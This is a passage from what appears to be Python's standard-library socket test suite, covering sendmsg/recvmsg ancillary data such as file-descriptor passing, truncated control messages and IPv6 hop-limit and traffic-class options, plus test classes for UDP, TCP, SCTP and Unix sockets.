fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
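# A minimal sketch (not executed here) of the receive path these tests
# exercise, assuming an AF_INET6 datagram socket `s` (placeholder name)
# on a platform that exposes the RFC 3542 constants:
#
#     s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVHOPLIMIT, 1)
#     msg, ancdata, flags, addr = s.recvmsg(1024,
#                                           socket.CMSG_SPACE(SIZEOF_INT))
#     # ancdata should then hold one (IPPROTO_IPV6, IPV6_HOPLIMIT, data)
#     # item whose data is a native int carrying the packet's hop limit.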
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecondCmsgTruncInData.client_skip
def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
